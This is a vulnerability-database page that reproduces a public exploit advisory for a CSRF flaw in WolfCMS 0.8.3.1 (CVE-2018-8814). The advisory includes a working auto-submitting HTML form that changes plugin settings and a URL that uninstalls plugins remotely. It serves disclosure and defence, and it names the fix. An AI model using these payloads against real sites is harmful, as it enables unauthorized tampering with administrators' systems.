Vulners
Lucene search
WolfCMS 0.8.3.1 - Cross-Site Request Forgery
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | WolfCMS 0.8.3.1 - Cross Site Request Forgery / Open Redirection Vulnerabilities | 9 Apr 201800:00 | – | zdt |
 | CVE-2018-8814 | 4 Apr 201815:29 | – | attackerkb |
 | Wolf CMS Cross-Site Request Forgery Vulnerability | 9 Apr 201800:00 | – | cnvd |
 | CVE-2018-8814 | 4 Apr 201815:00 | – | cve |
 | CVE-2018-8814 | 4 Apr 201815:00 | – | cvelist |
 | EUVD-2018-20423 | 7 Oct 202500:30 | – | euvd |
 | WolfCMS 0.8.3.1 - Cross-Site Request Forgery | 9 Apr 201800:00 | – | exploitpack |
 | CVE-2018-8814 | 4 Apr 201815:29 | – | nvd |
 | WolfCMS 0.8.3.1 Cross Site Request Forgery | 7 Apr 201800:00 | – | packetstorm |
 | Cross site request forgery (csrf) | 4 Apr 201815:29 | – | prion |
10
#######################################
# Exploit Title: WolfCMS 0.8.3.1 Cross Site Request Forgery
# Google Dork: N/A
# Date: 04-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.wolfcms.org
# Software Link:
# Affected Version: 0.8.3.1
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-8814
#
# 1. Vendor Description:
#
# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended
CMS. Uses MySQL, SQLite or (from 0.7)
# PostgreSQL for db. Simple drag & drop page hierarchy. Open source,
licensed under GPLv3.
#
# 2. Technical Description:
#
# Cross-site request forgery (CSRF) vulnerability in WolfCMS before 0.8.3.1
allows remote attackers to hijack the
# authentication of users for requests that modify
plugin/[pluginname]/settings and can uninstall plugins by sending
# malicious request.
#
# 3. Proof Of Concept:
#
# Send below request to logged in user to change the plugin settings.
#
#<html>
# <body>
# <form action="http://[URL]/wolf/wolfcms/?/admin/plugin/archive/save"
method="POST">
# <input type="hidden" name="settings[use_dates]"
value="1" />
# <input type="hidden" name="commit" value="Save" />
# <input type="submit" value="Submit request" />
# </form>
# <script>
# document.forms[0].submit();
# </script>
# </body>
#</html>
#
# Share the below URL to uninstall any plugin remotely.
#
# http://[url]/wolfcms/?/admin/setting/uninstall_plugin/[pluginname]
#
#
# 4. Solution:
#
# Upgrade to latest release.
# http://www.wolfcms.org/blog.html
#
# 5. Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8814
# https://github.com/wolfcms/wolfcms/issues/671
#####################################Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2018 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25.8
CVSS 36.5
EPSS0.00147